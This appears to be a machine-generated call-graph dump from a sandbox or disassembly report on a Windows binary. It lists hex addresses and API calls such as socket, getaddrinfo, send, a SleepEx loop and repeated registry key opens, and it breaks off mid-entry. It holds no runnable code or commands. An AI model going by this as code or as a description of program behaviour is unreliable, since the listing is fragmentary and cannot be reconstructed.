173d015c2cf 85414->85415 85419 173d0155be0 85414->85419 85415->85402 85416 173d015c2c3 85426 173d01588f0 free 85416->85426 85420 173d0155cc2 85419->85420 85421 173d0155c02 85419->85421 85420->85416 85421->85420 85422 173d0164bb0 14 API calls 85421->85422 85423 173d0155c25 85422->85423 85427 173d0158110 85423->85427 85425 173d0155c6d 85425->85416 85426->85415 85428 173d015818a 85427->85428 85429 173d015812e 85427->85429 85428->85425 85430 173d0158181 closesocket 85429->85430 85431 173d0158179 85429->85431 85432 173d015813f 85429->85432 85430->85428 85437 173d01878b0 free 85431->85437 85436 173d01878b0 free 85432->85436 85435 173d0158147 85435->85425 85436->85435 85437->85430 85438 173cfc10ee0 85439 173cfc10f40 85438->85439 85446 173cfc11d48 85439->85446 85441 173cfc10f97 85449 173cfc0f1e0 85441->85449 85476 173cfc11d40 85446->85476 85448 173cfc11d6d __stdio_common_vsprintf_s 85448->85441 85450 173cfc0f22a 85449->85450 85477 173cfc03c08 85450->85477 85453 173cfc0f2dc memset 85456 173cfc0f300 85453->85456 85454 173cfc0f2f1 85513 173cfc0b88c 6 API calls 4 library calls 85454->85513 85496 173cfc0be20 85456->85496 85458 173cfc0f34d 85461 173cfc0f3fb 85458->85461 85514 173cfc11bd0 19 API calls 85458->85514 85460 173cfc0f553 85463 173cfc0f59c 85460->85463 85465 173cfc0f595 _invalid_parameter_noinfo_noreturn 85460->85465 85461->85460 85515 173cfc03738 _invalid_parameter_noinfo_noreturn 85461->85515 85464 173cfc51a10 _File_size 8 API calls 85463->85464 85466 173cfc0f5b0 85464->85466 85465->85463 85467 173cfc51a10 85466->85467 85468 173cfc51a1a 85467->85468 85469 173cfc10fe4 85468->85469 85470 173cfc52320 IsProcessorFeaturePresent 85468->85470 85471 173cfc52337 85470->85471 85529 173cfc523f4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85471->85529 85473 173cfc5234a 85530 173cfc522e8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 85473->85530 85476->85448 85516 173cfc36700 85477->85516 85479 173cfc03c23 85480 173cfc36700 tidy_global _lock_locales 85479->85480 85484 173cfc03c72 85479->85484 85481 173cfc03c48 85480->85481 85519 173cfc367a0 _unlock_locales 85481->85519 85482 173cfc03cb7 85522 173cfc367a0 _unlock_locales 85482->85522 85484->85482 85520 173cfc060f0 24 API calls 2 library calls 85484->85520 85486 173cfc03d02 85486->85453 85486->85454 85488 173cfc03cc9 85489 173cfc03ccf 85488->85489 85490 173cfc03d12 85488->85490 85521 173cfc11d9c _CxxThrowException _CxxThrowException malloc std::_Facet_Register 85489->85521 85523 173cfc06a98 _CxxThrowException free free std::bad_alloc::bad_alloc 85490->85523 85497 173cfc36700 tidy_global _lock_locales 85496->85497 85498 173cfc0be3b 85497->85498 85499 173cfc36700 tidy_global _lock_locales 85498->85499 85504 173cfc0be8a 85498->85504 85501 173cfc0be60 85499->85501 85500 173cfc0becf 85527 173cfc367a0 _unlock_locales 85500->85527 85524 173cfc367a0 _unlock_locales 85501->85524 85503 173cfc0bf1a 85503->85458 85504->85500 85525 173cfc0c69c 33 API calls std::_Facet_Register 85504->85525 85507 173cfc0bee1 85508 173cfc0bee7 85507->85508 85509 173cfc0bf2a 85507->85509 85526 173cfc11d9c _CxxThrowException _CxxThrowException malloc std::_Facet_Register 85508->85526 85528 173cfc06a98 _CxxThrowException free free std::bad_alloc::bad_alloc 85509->85528 85513->85456 85514->85458 85517 173cfc3670f _lock_locales 85516->85517 85518 173cfc36717 85516->85518 85517->85518 85518->85479 85519->85484 85520->85488 85521->85482 85522->85486 85524->85504 85525->85507 85526->85500 85527->85503 85529->85473 85531 173d018fec0 memset 85532 173d018feed 85531->85532 85533 173d0189fa1 85568 173d01a4360 85533->85568 85536 173d018ef80 2 API calls 85538 173d0189fd4 85536->85538 85537 173d018a07e 85539 173d015cfb0 10 API calls 85537->85539 85547 173d0189ee0 85537->85547 85540 173d018ef80 2 API calls 85538->85540 85539->85547 85541 173d0189fe7 85540->85541 85543 173d018a01e 85541->85543 85545 173d01a3b60 2 API calls 85541->85545 85546 173d018a04f 85543->85546 85549 173d01a3b60 2 API calls 85543->85549 85544 173d018b0e4 85548 173d018a000 85545->85548 85615 173d01a5b80 85546->85615 85547->85544 85550 173d015cfb0 10 API calls 85547->85550 85553 173d0189840 20 API calls 85547->85553 85557 173d018ba90 free free 85547->85557 85558 173d0164a70 14 API calls 85547->85558 85636 173d01898c0 85547->85636 85649 173d015a330 85547->85649 85668 173d018f410 QueryPerformanceCounter GetTickCount 85547->85668 85669 173d0187540 18 API calls 85547->85669 85670 173d018f2d0 17 API calls 85547->85670 85632 173d0187650 18 API calls 85548->85632 85552 173d018a031 85549->85552 85550->85547 85633 173d0187650 18 API calls 85552->85633 85553->85547 85557->85547 85558->85547 85561 173d018a0d4 85561->85537 85563 173d018ef80 2 API calls 85561->85563 85566 173d018a0ef 85563->85566 85564 173d018a076 85564->85537 85564->85561 85634 173d0189840 20 API calls 85564->85634 85566->85537 85635 173d0189840 20 API calls 85566->85635 85569 173d01a4383 85568->85569 85570 173d01a43e7 85569->85570 85571 173d01a43b0 85569->85571 85572 173d01a4397 free 85569->85572 85672 173d0164a70 14 API calls 85570->85672 85573 173d01a4400 85571->85573 85576 173d01a43be free 85571->85576 85572->85571 85575 173d01a442b 85573->85575 85578 173d01a4412 85573->85578 85674 173d01b5710 calloc 85575->85674 85671 173d01a9f80 8 API calls 85576->85671 85577 173d0189fa9 85577->85536 85577->85537 85673 173d0164a70 14 API calls 85578->85673 85582 173d01a446f 85582->85577 85584 173d01a4479 free 85582->85584 85583 173d01a43e3 85583->85570 85583->85573 85587 173d01a44e5 85584->85587 85586 173d01a4559 85588 173d01a456a 85586->85588 85676 173d0174440 48 API calls 85586->85676 85675 173d01608d0 91 API calls 85587->85675 85677 173d01758b0 42 API calls 85588->85677 85591 173d01a4574 85608 173d01a4633 85591->85608 85678 173d01726c0 free free free free free 85591->85678 85593 173d01a463e free 85681 173d0184d90 85593->85681 85594 173d01a4665 85599 173d01a4671 85594->85599 85614 173d01a46da 85594->85614 85691 173d01946d0 free _strdup 85594->85691 85595 173d01a458b 85679 173d018ee70 QueryPerformanceCounter GetTickCount 85595->85679 85599->85577 85600 173d01a468f 85600->85614 85692 173d01946d0 free _strdup 85600->85692 85602 173d01a459b 85605 173d01a45c9 calloc 85602->85605 85610 173d01a45ec 85602->85610 85612 173d01a4620 85602->85612 85604 173d01a46a8 85604->85614 85693 173d01946d0 free _strdup 85604->85693 85605->85599 85605->85610 85608->85593 85608->85594 85609 173d01a45fe free free 85609->85612 85610->85609 85610->85612 85611 173d01a46c1 85611->85614 85694 173d01946d0 free _strdup 85611->85694 85612->85599 85680 173d0175770 17 API calls 85612->85680 85695 173d0173340 free 85614->85695 85698 173d0190160 free free 85615->85698 85619 173d01a5bbe 85620 173d01a5bdf 85619->85620 85621 173d01a5c19 85619->85621 85622 173d018ef80 2 API calls 85619->85622 85620->85564 85621->85620 85623 173d015a330 85 API calls 85621->85623 85624 173d01a5c09 85622->85624 85623->85620 85624->85621 85625 173d01a3b60 2 API calls 85624->85625 85626 173d01a5c29 85625->85626 85627 173d01a5c5c 85626->85627 85628 173d01a5c3c 85626->85628 85781 173d01733d0 8 API calls 85627->85781 85780 173d015cb20 8 API calls 85628->85780 85631 173d01a5c56 85631->85621 85631->85627 85632->85543 85633->85546 85634->85561 85635->85537 85637 173d01898eb 85636->85637 85638 173d01898f2 85636->85638 85637->85547 86091 173d01526f0 85638->86091 85650 173d015a339 85649->85650 85658 173d015a46b 85649->85658 85651 173d015a427 85650->85651 85652 173d015a46d 85650->85652 85650->85658 85654 173d0164b60 18 API calls 85651->85654 85653 173d0164b60 18 API calls 85652->85653 85655 173d015a47f 85653->85655 85656 173d015a44e 85654->85656 86107 173d015bae0 85655->86107 86098 173d015b4c0 85656->86098 85658->85547 85661 173d015a4aa 86118 173d0158c90 85661->86118 85665 173d0158c90 15 API calls 85666 173d015a4c1 85665->85666 86122 173d01a5720 32 API calls 85666->86122 85668->85547 85669->85547 85670->85547 85671->85583 85672->85577 85673->85577 85674->85582 85675->85586 85676->85588 85677->85591 85678->85595 85679->85602 85680->85608 85682 173d0184dc6 85681->85682 85696 173d01850f0 8 API calls 85682->85696 85684 173d0184de2 85685 173d0184dfc 85684->85685 85686 173d0184dee 85684->85686 85689 173d0184e17 _strdup 85685->85689 85690 173d0184e06 85685->85690 85697 173d0167c70 free 85686->85697 85688 173d0184df3 85688->85594 85689->85594 85690->85594 85691->85600 85692->85604 85693->85611 85694->85614 85695->85599 85696->85684 85697->85688 85782 173d0193920 85698->85782 85700 173d01901b0 85792 173d01665c0 85700->85792 85702 173d01901ca 85703 173d01a6b50 85702->85703 85704 173d01a6b9d 85703->85704 85778 173d01a6b93 85703->85778 85810 173d01a6910 calloc 85704->85810 85706 173d01a6ba2 85706->85778 85818 173d01a8670 85706->85818 85707 173d01b9e10 8 API calls 85709 173d01a74ce 85707->85709 85709->85619 85711 173d01a6bea 85713 173d01a6bf6 _strdup 85711->85713 85714 173d01a6c08 85711->85714 85712 173d01a6bd8 _strdup 85712->85711 85712->85778 85713->85714 85713->85778 85715 173d01a6c26 85714->85715 85716 173d01a6c14 _strdup 85714->85716 85888 173d01a74f0 85715->85888 85716->85715 85716->85778 85720 173d0184eb0 8 API calls 85721 173d01a6c9c 85720->85721 85721->85778 85937 173d01a7960 85721->85937 85723 173d01a6d0c _strdup 85724 173d01a6d22 85723->85724 85723->85778 85725 173d01a6d30 _strdup 85724->85725 85726 173d01a6d46 85724->85726 85725->85726 85726->85778 85962 173d01a7e20 85726->85962 85728 173d01a6d60 85729 173d0184d90 10 API calls 85728->85729 85728->85778 85730 173d01a6eb2 85729->85730 85731 173d01a6efd 85730->85731 85732 173d01a6f92 85730->85732 85730->85778 85733 173d01a6f82 85731->85733 85734 173d01a6f38 85731->85734 85732->85778 85978 173d015ad70 85732->85978 85736 173d01a5fc0 23 API calls 85733->85736 86021 173d0159b70 6 API calls 85734->86021 85736->85778 85737 173d01a6fe3 85741 173d01a7303 85737->85741 85759 173d01a70f3 85737->85759 85739 173d01a6f4e 85740 173d01a9050 12 API calls 85739->85740 85739->85778 85749 173d01a6f60 85740->85749 85742 173d01a749d 85741->85742 86023 173d0159ee0 85 API calls 85741->86023 85743 173d0164b60 18 API calls 85742->85743 85745 173d01a74ac 85743->85745 86026 173d01a5720 32 API calls 85745->86026 85746 173d01a733c 85747 173d01a748e 85746->85747 85751 173d01a7345 85746->85751 85752 173d0164b60 18 API calls 85747->85752 85749->85733 85753 173d01a6f69 85749->85753 85750 173d01a737c 86024 173d01b4ee0 15 API calls 85750->86024 85751->85750 85754 173d0164b60 18 API calls 85751->85754 85752->85742 85753->85778 85756 173d01a736e 85754->85756 85756->85742 85756->85750 85757 173d01a7387 85758 173d01a7391 85757->85758 85757->85778 86025 173d0159b70 6 API calls 85758->86025 85760 173d01a714e 85759->85760 85761 173d01a70fc free free 85759->85761 85762 173d01a7163 free free free free 85760->85762 85763 173d01a7207 free free free 85760->85763 85761->85760 85762->85763 86022 173d01a5720 32 API calls 85763->86022 85767 173d01a73d1 85768 173d01a72fe 85767->85768 85773 173d0164b60 18 API calls 85767->85773 85987 173d01a5fc0 85768->85987 85770 173d01a73a7 85770->85767 85772 173d0164b60 18 API calls 85770->85772 85770->85778 85772->85767 85775 173d01a73ff 85773->85775 85774 173d01a7417 85991 173d01a9050 85774->85991 85775->85768 85778->85707 85780->85631 85781->85621 85783 173d0193944 85782->85783 85784 173d0193936 85782->85784 85804 173d0164d90 18 API calls 85783->85804 85803 173d0164d90 18 API calls 85784->85803 85787 173d0193950 85805 173d0194380 free 85787->85805 85789 173d019399c 85789->85700 85790 173d0193942 85790->85789 85791 173d0193987 free 85790->85791 85791->85789 85791->85790 85793 173d0166691 85792->85793 85795 173d01665dd 85792->85795 85793->85702 85794 173d0166630 85794->85793 85808 173d0189180 261 API calls 85794->85808 85795->85793 85795->85794 85806 173d0189180 261 API calls 85795->85806 85798 173d0166626 85807 173d01a53c0 261 API calls 85798->85807 85799 173d016667c 85809 173d01a53c0 261 API calls 85799->85809 85802 173d0166686 85802->85702 85803->85790 85804->85787 85805->85790 85806->85798 85807->85794 85808->85799 85809->85802 85811 173d01a6939 85810->85811 85812 173d01a6ab8 85810->85812 85813 173d01a3b60 2 API calls 85811->85813 85812->85706 85814 173d01a6998 85813->85814 85815 173d01a6a95 _strdup 85814->85815 85816 173d01a6ae9 85814->85816 85815->85816 85817 173d01a6aa7 free free 85815->85817 85816->85706 85817->85812 85819 173d01a868b 85818->85819 85820 173d01a86aa 85818->85820 85819->85820 85821 173d01a8694 85819->85821 86029 173d01a9110 19 API calls 85820->86029 86027 173d01a9110 19 API calls 85821->86027 85823 173d01a86b2 86030 173d0171840 calloc 85823->86030 85826 173d01a869c 86028 173d01a9e10 22 API calls 85826->86028 85828 173d01a86a8 85829 173d01a86b7 85828->85829 85832 173d01a873d 85829->85832 85836 173d0184d90 10 API calls 85829->85836 85840 173d01a6bc2 85829->85840 85830 173d01a881d 86033 173d01a9f80 8 API calls 85830->86033 85832->85830 85834 173d01a87e2 85832->85834 85835 173d01a8792 85832->85835 85833 173d01a884a 85833->85840 86034 173d01a9f80 8 API calls 85833->86034 86032 173d01a9f80 8 API calls 85834->86032 86031 173d0164a70 14 API calls 85835->86031 85837 173d01a871b 85836->85837 85837->85832 85837->85840 85843 173d01a8730 free 85837->85843 85840->85711 85840->85712 85840->85778 85841 173d01a87f4 85841->85830 85841->85840 85844 173d01a8810 free 85841->85844 85843->85832 85844->85830 85845 173d01a89f5 86037 173d0164a70 14 API calls 85845->86037 85846 173d01a88cd _strdup 85846->85840 85852 173d01a8865 85846->85852 85849 173d01a8da2 86048 173d0164a70 14 API calls 85849->86048 85852->85840 85852->85845 85852->85846 85853 173d01a8945 free 85852->85853 85854 173d01a8978 free 85852->85854 85855 173d01a9f80 8 API calls 85852->85855 85856 173d01a8a36 85852->85856 85861 173d01a89bf free 85852->85861 85862 173d01a8a14 85852->85862 86035 173d01a99f0 34 API calls 85852->86035 86036 173d0175520 16 API calls 85852->86036 85853->85852 85854->85852 85855->85852 85856->85849 85858 173d01a8aee 85856->85858 85857 173d01a8b8e 85857->85840 85859 173d01a8c45 85857->85859 86041 173d01a9f80 8 API calls 85857->86041 85858->85857 86038 173d01a9f80 8 API calls 85858->86038 85859->85840 86044 173d01a9f80 8 API calls 85859->86044 85861->85852 85864 173d0164b60 18 API calls 85862->85864 85864->85856 85866 173d01a8b25 85866->85857 85869 173d01a8b2f 85866->85869 85867 173d01a8bb2 85870 173d01a8bb8 85867->85870 85880 173d01a8c24 85867->85880 85868 173d01a8c69 85871 173d01a8cac 85868->85871 85872 173d01a8c6f _strdup 85868->85872 86039 173d0169250 malloc free 85869->86039 86042 173d0169250 malloc free 85870->86042 85871->85840 86045 173d01a9f80 8 API calls 85871->86045 85872->85840 85872->85871 85875 173d01a8b5d 85875->85840 86040 173d01946d0 free _strdup 85875->86040 85876 173d01a8be5 85876->85840 85876->85880 85879 173d01a8ccf 85879->85840 86046 173d01a9f80 8 API calls 85879->86046 85880->85840 85880->85859 86043 173d01946d0 free _strdup 85880->86043 85882 173d01a8b7d 85882->85840 85882->85857 85884 173d01a8d11 85885 173d01a8d31 strtoul 85884->85885 85886 173d01a8d15 85884->85886 85885->85886 85886->85840 86047 173d01a9f80 8 API calls 85886->86047 85889 173d01a7574 85888->85889 85890 173d01a7527 _strdup 85888->85890 85892 173d01a7582 _strdup 85889->85892 85893 173d01a75c7 85889->85893 85891 173d01a755f _strdup 85890->85891 85912 173d01a759f 85890->85912 85891->85889 85896 173d01a75a9 free 85891->85896 85892->85893 85897 173d01a7590 85892->85897 85894 173d01a75e1 85893->85894 85895 173d01a75d3 _strdup 85893->85895 85899 173d01a7635 85894->85899 86050 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85894->86050 85895->85894 85895->85897 85898 173d01a7920 free free 85896->85898 86049 173d0164a70 14 API calls 85897->86049 85901 173d01b9e10 8 API calls 85898->85901 86052 173d018c300 21 API calls 85899->86052 85904 173d01a6c3e 85901->85904 85904->85720 85904->85721 85904->85778 85905 173d01a7601 85907 173d01a7618 85905->85907 86051 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85905->86051 85906 173d01a764f 85908 173d01a7653 free free free 85906->85908 85909 173d01a7677 85906->85909 85907->85899 85911 173d0164b60 18 API calls 85907->85911 85908->85912 85913 173d01a773f free 85909->85913 85914 173d0184eb0 8 API calls 85909->85914 85911->85899 85912->85898 85917 173d01a774d 85913->85917 85919 173d01a7777 85913->85919 85916 173d01a76ae 85914->85916 85915 173d01a776c free 85915->85919 86053 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85916->86053 85917->85915 85917->85919 85918 173d01a7792 free 85920 173d01a779d 85918->85920 85919->85918 85919->85920 85920->85912 85922 173d01a7820 85920->85922 86057 173d01a81c0 63 API calls 85920->86057 85929 173d01a784b 85922->85929 86058 173d01a81c0 63 API calls 85922->86058 85924 173d01a7722 85924->85913 85927 173d0164b60 18 API calls 85924->85927 85925 173d01a780b free 85925->85912 85925->85922 85927->85913 85928 173d01a7836 free 85928->85912 85928->85929 85929->85912 85931 173d01a78c8 free 85929->85931 85930 173d01a76f4 85930->85924 86055 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85930->86055 85931->85912 85933 173d01a76b8 85933->85924 85933->85930 86054 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85933->86054 85934 173d01a770b 85934->85924 86056 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85934->86056 85938 173d01a799c free _strdup 85937->85938 85939 173d01a79c6 85937->85939 85938->85939 85959 173d01a6cc8 85938->85959 85940 173d01a79d2 free free 85939->85940 85941 173d01a79ea 85939->85941 85940->85941 85942 173d01a7ace 85941->85942 86059 173d018bd10 38 API calls 85941->86059 85950 173d01a7ae7 85942->85950 86061 173d01946d0 free _strdup 85942->86061 85944 173d01a7b71 85956 173d01a7b88 85944->85956 86062 173d01946d0 free _strdup 85944->86062 85945 173d01a7a32 85947 173d01a7a60 85945->85947 85948 173d01a7a36 85945->85948 85952 173d01a7a5e 85947->85952 85953 173d01a7a62 85947->85953 85951 173d0164b60 18 API calls 85948->85951 85950->85944 85954 173d01a7b52 _strdup 85950->85954 85950->85959 85951->85952 85957 173d01a7a87 free _strdup 85952->85957 85958 173d01a7aa8 85952->85958 86060 173d0164a70 14 API calls 85953->86060 85954->85944 85954->85959 85956->85959 85960 173d01a7bd2 _strdup 85956->85960 85957->85958 85957->85959 85958->85942 85961 173d01a7ab5 _strdup 85958->85961 85959->85723 85959->85724 85959->85778 85960->85959 85961->85942 85961->85959 85972 173d01a7e52 85962->85972 85963 173d01a8058 85963->85728 85964 173d01a8066 85964->85963 86064 173d0151130 _time64 free free free 85964->86064 85965 173d0184d90 10 API calls 85965->85972 85967 173d01a7f2a strchr 85969 173d01a7f3c strtol 85967->85969 85967->85972 85968 173d01a80cc 85968->85963 85970 173d01a80d4 _strdup 85968->85970 85969->85972 85970->85963 85976 173d01a80f8 85970->85976 85972->85963 85972->85964 85972->85965 85972->85967 85973 173d01a7fdc free 85972->85973 85974 173d01a7ef7 free 85972->85974 85975 173d0164b60 18 API calls 85972->85975 86063 173d01a7c10 24 API calls 85972->86063 85973->85972 85974->85972 85975->85972 85977 173d0164b60 18 API calls 85976->85977 85977->85963 85979 173d015ad79 85978->85979 85982 173d015af68 85978->85982 85981 173d01a3b60 2 API calls 85979->85981 85983 173d015aef9 85979->85983 85980 173d01b9e10 8 API calls 85980->85982 85984 173d015adfc 85981->85984 85982->85737 85983->85980 85984->85983 85986 173d015a330 85 API calls 85984->85986 86065 173d01a58e0 20 API calls 85984->86065 85986->85984 85988 173d01a5fd2 85987->85988 86066 173d0190690 85988->86066 85990 173d01a6022 85990->85774 85992 173d01a9070 85991->85992 85993 173d01a909b 85992->85993 85994 173d01a9092 free 85992->85994 85998 173d01a741f 85992->85998 85995 173d01a90b5 _strdup 85993->85995 85996 173d01a90a7 85993->85996 85994->85993 85995->85998 85997 173d0184d90 10 API calls 85996->85997 85997->85998 85998->85778 85999 173d01a8e00 85998->85999 86000 173d015cfb0 10 API calls 85999->86000 86003 173d01a8e29 86000->86003 86001 173d01a8f9d calloc 86002 173d01a8fcb 86001->86002 86014 173d01a8f13 86001->86014 86089 173d0161b60 calloc free memmove 86002->86089 86003->86001 86004 173d01a8e80 _strdup 86003->86004 86005 173d01a8e58 strncmp 86003->86005 86013 173d01a8ef3 86004->86013 86004->86014 86005->86004 86007 173d01a8e6f 86005->86007 86007->86001 86007->86004 86008 173d01a8fe3 86010 173d01a9026 86008->86010 86011 173d01a9006 free 86008->86011 86090 173d0164a70 14 API calls 86008->86090 86010->86014 86011->86014 86013->86014 86015 173d01a8f72 86013->86015 86016 173d01a8f20 86013->86016 86014->85778 86015->86014 86088 173d0164a70 14 API calls 86015->86088 86017 173d01a3b60 2 API calls 86016->86017 86018 173d01a8f36 86017->86018 86087 173d0164a70 14 API calls 86018->86087 86021->85739 86023->85746 86024->85757 86025->85770 86027->85826 86028->85828 86029->85823 86031->85840 86032->85841 86033->85833 86034->85852 86035->85846 86036->85852 86037->85840 86038->85866 86039->85875 86040->85882 86041->85867 86042->85876 86043->85859 86044->85868 86045->85879 86046->85884 86047->85840 86048->85840 86049->85912 86050->85905 86051->85907 86052->85906 86053->85933 86054->85930 86055->85934 86056->85924 86057->85925 86058->85928 86059->85945 86060->85959 86061->85950 86062->85956 86063->85972 86064->85968 86065->85984 86067 173d01a3b60 2 API calls 86066->86067 86068 173d01906af 86067->86068 86073 173d01939c0 86068->86073 86070 173d01906fa 86072 173d0190710 86070->86072 86083 173d01532b0 free free 86070->86083 86072->85990 86074 173d01939db 86073->86074 86075 173d0193a1d 86073->86075 86084 173d0164d90 18 API calls 86074->86084 86075->86070 86077 173d0193a0e 86085 173d0194380 free 86077->86085 86079 173d01939ee 86079->86077 86080 173d0193a2f 86079->86080 86086 173d0164a70 14 API calls 86080->86086 86082 173d0193a47 86082->86070 86083->86072 86084->86079 86085->86075 86086->86082 86087->86014 86088->86014 86089->86008 86090->86011 86092 173d0152705 86091->86092 86093 173d0152720 86091->86093 86092->86093 86094 173d0152714 86092->86094 86097 173d0164930 WaitForSingleObjectEx CloseHandle 86094->86097 86096 173d0152719 86096->86093 86097->86096 86099 173d015b4eb 86098->86099 86101 173d015b690 86099->86101 86105 173d015b511 86099->86105 86123 173d015b9f0 43 API calls 86099->86123 86101->85658 86102 173d015bae0 27 API calls 86102->86105 86104 173d0158c90 15 API calls 86104->86105 86105->86101 86105->86102 86105->86104 86124 173d01a5720 32 API calls 86105->86124 86125 173d015be20 14 API calls 86105->86125 86108 173d015baf9 86107->86108 86116 173d015a495 86107->86116 86109 173d015bb08 86108->86109 86126 173d0174ff0 free free 86108->86126 86127 173d017e150 8 API calls 86109->86127 86116->85661 86117 173d015b9f0 43 API calls 86116->86117 86117->85661 86119 173d0158cba 86118->86119 86120 173d0158cb1 86118->86120 86119->85665 86128 173d01555f0 86120->86128 86123->86105 86125->86105 86126->86109 86129 173d0164bb0 14 API calls 86128->86129 86130 173d0155612 86129->86130 86135 173d0155b30 86130->86135 86132 173d015563f 86132->86119 86136 173d0155b4a 86135->86136 86137 173d015561d 86135->86137 86139 173d0155b70 86136->86139 86142 173d01588f0 free 86136->86142 86137->86132 86141 173d01588f0 free 86137->86141 86139->86137 86143 173d01588f0 free 86139->86143 86141->86132 86142->86139 86143->86137 86144 173d03b1bc0 86151 173d03b1724 GetProcessHeap HeapAlloc 86144->86151 86146 173d03b1bd6 SleepEx 86147 173d03b1724 50 API calls 86146->86147 86149 173d03b1bcf 86147->86149 86149->86146 86150 173d03b159c StrCmpIW StrCmpW 86149->86150 86202 173d03b19b0 12 API calls 86149->86202 86150->86149 86203 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86151->86203 86153 173d03b174c 86204 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86153->86204 86155 173d03b1754 86205 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86155->86205 86157 173d03b175d 86206 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86157->86206 86159 173d03b1766 86207 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86159->86207 86161 173d03b176f 86208 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86161->86208 86163 173d03b1778 86209 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86163->86209 86165 173d03b1781 86210 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86165->86210 86167 173d03b178a RegOpenKeyExW 86168 173d03b17bc RegOpenKeyExW 86167->86168 86169 173d03b19a2 86167->86169 86170 173d03b17fb RegOpenKeyExW 86168->86170 86171 173d03b17e5 86168->86171 86169->86149 86173 173d03b181f 86170->86173 86174 173d03b1836 RegOpenKeyExW 86170->86174 86211 173d03b12b8 16 API calls 86171->86211 86212 173d03b104c 6 API calls 86173->86212 86177 173d03b1871 RegOpenKeyExW 86174->86177 86178 173d03b185a 86174->86178 86175 173d03b17f1 RegCloseKey 86175->86170 86179 173d03b18ac RegOpenKeyExW 86177->86179 86180 173d03b1895 86177->86180 86213 173d03b12b8 16 API calls 86178->86213 86185 173d03b18d0 86179->86185 86186 173d03b18e7 RegOpenKeyExW 86179->86186 86214 173d03b12b8 16 API calls 86180->86214 86181 173d03b182c RegCloseKey 86181->86174 86183 173d03b1867 RegCloseKey 86183->86177 86215 173d03b12b8 16 API calls 86185->86215 86189 173d03b190b 86186->86189 86190 173d03b1922 RegOpenKeyExW 86186->86190 86187 173d03b18a2 RegCloseKey 86187->86179 86216 173d03b104c 6 API calls 86189->86216 86193 173d03b195d RegOpenKeyExW 86190->86193 86194 173d03b1946 86190->86194 86191 173d03b18dd RegCloseKey 86191->86186 86195 173d03b1981 86193->86195 86196 173d03b1998 RegCloseKey 86193->86196 86217 173d03b104c 6 API calls 86194->86217 86218 173d03b104c 6 API calls 86195->86218 86196->86169 86197 173d03b1918 RegCloseKey 86197->86190 86199 173d03b1953 RegCloseKey 86199->86193 86201 173d03b198e RegCloseKey 86201->86196 86203->86153 86204->86155 86205->86157 86206->86159 86207->86161 86208->86163 86209->86165 86210->86167 86211->86175 86212->86181 86213->86183 86214->86187 86215->86191 86216->86197 86217->86199 86218->86201 86219 173d0152940 86220 173d0184eb0 8 API calls 86219->86220 86221 173d015297f 86220->86221 86238 173d01616f0 getaddrinfo 86221->86238 86224 173d015299b WSAGetLastError 86226 173d01529a5 WSAGetLastError 86224->86226 86227 173d01529b2 86224->86227 86225 173d01529be EnterCriticalSection 86228 173d01529e9 86225->86228 86229 173d01529cd LeaveCriticalSection 86225->86229 86226->86225 86226->86227 86227->86225 86231 173d0152a19 LeaveCriticalSection 86228->86231 86232 173d01529f3 send 86228->86232 86253 173d01528c0 DeleteCriticalSection free free closesocket free 86229->86253 86235 173d0152a29 86231->86235 86232->86231 86234 173d0152a10 WSAGetLastError 86232->86234 86233 173d01529de free 86233->86235 86234->86231 86236 173d01b9e10 8 API calls 86235->86236 86237 173d0152a38 86236->86237 86241 173d016171d 86238->86241 86251 173d0152995 86238->86251 86239 173d016186e WSASetLastError 86239->86251 86240 173d0161822 86243 173d0161844 86240->86243 86244 173d016183e freeaddrinfo 86240->86244 86241->86239 86241->86240 86242 173d016179a malloc 86241->86242 86245 173d0161824 86242->86245 86246 173d01617af memmove 86242->86246 86247 173d0161869 86243->86247 86248 173d0161849 86243->86248 86244->86243 86245->86240 86249 173d0161802 86246->86249 86250 173d01617eb memmove 86246->86250 86247->86239 86247->86251 86248->86251 86252 173d0161850 free 86248->86252 86249->86241 86250->86249 86251->86224 86251->86225 86252->86251 86252->86252 86253->86233 86254 173d0152380 86255 173d01523c8 86254->86255 86258 173d01523cd 86254->86258 86264 173d01743b0 86255->86264 86257 173d01a3b60 2 API calls 86259 173d015241b 86257->86259 86258->86257 86269 173d0152a50 calloc 86259->86269 86262 173d015243a 86265 173d0174400 socket 86264->86265 86268 173d01743be 86264->86268 86266 173d0174419 86265->86266 86267 173d0174426 closesocket 86265->86267 86266->86258 86267->86258 86268->86258 86270 173d0152bf4 _errno 86269->86270 86271 173d0152aa1 malloc 86269->86271 86298 173d0152436 86270->86298 86272 173d0152b22 InitializeCriticalSectionEx 86271->86272 86281 173d0152b53 86271->86281 86308 173d019b3f0 socket 86272->86308 86274 173d0152b7b 86276 173d0152b94 free 86274->86276 86277 173d0152b84 DeleteCriticalSection free 86274->86277 86275 173d0152b6d closesocket 86275->86274 86279 173d0152ba7 86276->86279 86280 173d0152bac 86276->86280 86277->86276 86342 173d01616c0 free 86279->86342 86284 173d0152bb6 closesocket 86280->86284 86285 173d0152bbc free 86280->86285 86281->86274 86281->86275 86282 173d0152c1c _strdup 86282->86281 86286 173d0152c36 free _strdup 86282->86286 86284->86285 86285->86270 86287 173d0152c58 86286->86287 86288 173d0152c84 86286->86288 86340 173d01648e0 _beginthreadex 86287->86340 86289 173d0152c90 EnterCriticalSection LeaveCriticalSection 86288->86289 86290 173d0152d02 free 86288->86290 86292 173d0152cba 86289->86292 86293 173d0152ccb 86289->86293 86290->86270 86343 173d0164920 CloseHandle 86292->86343 86296 173d0152cd8 86293->86296 86297 173d0152cd0 86293->86297 86345 173d01528c0 DeleteCriticalSection free free closesocket free 86296->86345 86344 173d0164930 WaitForSingleObjectEx CloseHandle 86297->86344 86298->86262 86307 